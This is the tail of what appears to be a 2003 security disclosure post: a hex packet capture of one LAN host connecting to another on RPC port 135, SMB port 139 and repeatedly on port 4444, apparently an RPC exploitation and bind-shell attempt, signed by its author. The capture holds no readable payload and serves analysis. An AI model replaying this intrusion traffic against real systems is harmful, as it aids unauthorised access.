00000010 c0 a8 00 04 0c 31 00 87 83 42 90 b4 00 00 00 00 À¨  1 ‡ƒB´    
00000020 80 02 7f ff 4d 13 00 00 02 04 05 b4 01 03 03 00 €ÿM  ´ 
00000030 01 01 04 02                                     

[02:51:44.940 - 30.07.2003]
Proto: TCP len: 52 192.168.0.2:3122 -> 192.168.0.4:4444 

00000000 45 00 00 34 10 eb 40 00 80 06 68 82 c0 a8 00 02 E  4ë@ €h‚À¨ 
00000010 c0 a8 00 04 0c 32 11 5c 83 45 02 d9 00 00 00 00 À¨  2\ƒEÙ    
00000020 80 02 7f ff ca 15 00 00 02 04 05 b4 01 03 03 00 €ÿÊ  ´ 
00000030 01 01 04 02                                     

[02:51:45.381 - 30.07.2003]
Proto: TCP len: 52 192.168.0.2:3122 -> 192.168.0.4:4444 

00000000 45 00 00 34 10 ec 40 00 80 06 68 81 c0 a8 00 02 E  4ì@ €hÀ¨ 
00000010 c0 a8 00 04 0c 32 11 5c 83 45 02 d9 00 00 00 00 À¨  2\ƒEÙ    
00000020 80 02 7f ff ca 15 00 00 02 04 05 b4 01 03 03 00 €ÿÊ  ´ 
00000030 01 01 04 02                                     

[02:51:45.451 - 30.07.2003]
Proto: TCP len: 52 192.168.0.2:3123 -> 192.168.0.4:135 

00000000 45 00 00 34 10 ed 40 00 80 06 68 80 c0 a8 00 02 E  4í@ €h€À¨ 
00000010 c0 a8 00 04 0c 33 00 87 83 47 75 c2 00 00 00 00 À¨  3 ‡ƒGuÂ    
00000020 80 02 7f ff 67 fe 00 00 02 04 05 b4 01 03 03 00 €ÿgþ  ´ 
00000030 01 01 04 02                                     

[02:51:45.591 - 30.07.2003]
Proto: TCP len: 93 192.168.0.2:2938 -> 192.168.0.4:139 

00000000 45 00 00 5d 10 ee 40 00 80 06 68 56 c0 a8 00 02 E  ]î@ €hVÀ¨ 
00000010 c0 a8 00 04 0b 7a 00 8b 7d 6f eb 83 70 0b be 5f À¨  z ‹}oëƒp ¾_
00000020 50 18 7f 63 2d f8 00 00 00 00 00 31 ff 53 4d 42 Pc-ø     1ÿSMB
00000030 2b 00 00 00 00 18 43 c0 00 00 00 00 00 00 00 00 +    CÀ        
00000040 00 00 00 00 ff ff ff fe 00 00 fe ff 01 01 00 0c     ÿÿÿþ  þÿ  
00000050 00 4a 6c 4a 6d 49 68 43 6c 42 73 72 00           JlJmIhClBsr 

[02:51:45.601 - 30.07.2003]
Proto: TCP len: 93 192.168.0.4:139 -> 192.168.0.2:2938 

00000000 45 00 00 5d 07 fe 40 00 80 06 71 46 c0 a8 00 04 E  ] þ@ €qFÀ¨ 
00000010 c0 a8 00 02 00 8b 0b 7a 70 0b be 5f 7d 6f eb b8 À¨  ‹ zp ¾_}oë¸
00000020 50 18 f6 f5 b5 b0 00 00 00 00 00 31 ff 53 4d 42 Pöõµ°     1ÿSMB
00000030 2b 00 00 00 00 98 43 c0 00 00 00 00 00 00 00 00 +    ˜CÀ        
00000040 00 00 00 00 ff ff ff fe 00 00 fe ff 01 01 00 0c     ÿÿÿþ  þÿ  
00000050 00 4a 6c 4a 6d 49 68 43 6c 42 73 72 00           JlJmIhClBsr 

[02:51:45.882 - 30.07.2003]
Proto: TCP len: 52 192.168.0.2:3123 -> 192.168.0.4:135 

00000000 45 00 00 34 10 f0 40 00 80 06 68 7d c0 a8 00 02 E  4ð@ €h}À¨ 
00000010 c0 a8 00 04 0c 33 00 87 83 47 75 c2 00 00 00 00 À¨  3 ‡ƒGuÂ    
00000020 80 02 7f ff 67 fe 00 00 02 04 05 b4 01 03 03 00 €ÿgþ  ´ 
00000030 01 01 04 02                                     

[02:51:45.942 - 30.07.2003]
Proto: TCP len: 52 192.168.0.2:3124 -> 192.168.0.4:4444 

00000000 45 00 00 34 10 f1 40 00 80 06 68 7c c0 a8 00 02 E  4ñ@ €h|À¨ 
00000010 c0 a8 00 04 0c 34 11 5c 83 4a 0c b5 00 00 00 00 À¨  4\ƒJ µ    
00000020 80 02 7f ff c0 32 00 00 02 04 05 b4 01 03 03 00 €ÿÀ2  ´ 
00000030 01 01 04 02                                     

[02:51:46.382 - 30.07.2003]
Proto: TCP len: 52 192.168.0.2:3124 -> 192.168.0.4:4444 

00000000 45 00 00 34 10 f2 40 00 80 06 68 7b c0 a8 00 02 E  4ò@ €h{À¨ 
00000010 c0 a8 00 04 0c 34 11 5c 83 4a 0c b5 00 00 00 00 À¨  4\ƒJ µ    
00000020 80 02 7f ff c0 32 00 00 02 04 05 b4 01 03 03 00 €ÿÀ2  ´ 
00000030 01 01 04 02                                     

[02:51:50.018 - 30.07.2003]
Proto: UDP len: 229 192.168.0.4:138 -> 192.168.0.255:138 

00000000 45 00 00 e5 08 02 00 00 80 11 af b2 c0 a8 00 04 E  å   €¯²À¨ 
00000010 c0 a8 00 ff 00 8a 00 8a 00 d1 48 83 11 02 80 51 À¨ ÿ Š Š ÑHƒ€Q
00000020 c0 a8 00 04 00 8a 00 bb 00 00 20 45 43 45 4a 46 À¨  Š »   ECEJF
00000030 45 45 44 45 49 45 43 45 50 46 49 43 41 43 41 43 EEDEIECEPFICACAC
00000040 41 43 41 43 41 43 41 43 41 43 41 00 20 44 44 44 ACACACACACA  DDD
00000050 44 44 44 43 41 43 41 43 41 43 41 43 41 43 41 43 DDDCACACACACACAC
00000060 41 43 41 43 41 43 41 43 41 43 41 42 4e 00 ff 53 ACACACACACABN ÿS
00000070 4d 42 25 00 00 00 00 00 00 00 00 00 00 00 00 00 MB%             
00000080 00 00 00 00 00 00 00 00 00 00 00 00 00 00 11 00                
00000090 00 21 00 00 00 00 00 00 00 00 00 e8 03 00 00 00  !         è   
000000a0 00 00 00 00 00 21 00 56 00 03 00 01 00 00 00 02      ! V     
000000b0 00 32 00 5c 4d 41 49 4c 53 4c 4f 54 5c 42 52 4f  2 \MAILSLOT\BRO
000000c0 57 53 45 00 01 00 80 fc 0a 00 42 49 54 43 48 42 WSE  €ü  BITCHB
000000d0 4f 58 00 00 20 00 66 00 72 00 05 01 03 10 03 00 OX    f r  
000000e0 0f 01 55 aa 00                                  Uª 


==================== end ==============================


Donnie Werner
morning_wood@exploitlabs.com

http://e2-labs.com
http://exploitlabs.com
http://nothackers.org  

buh bye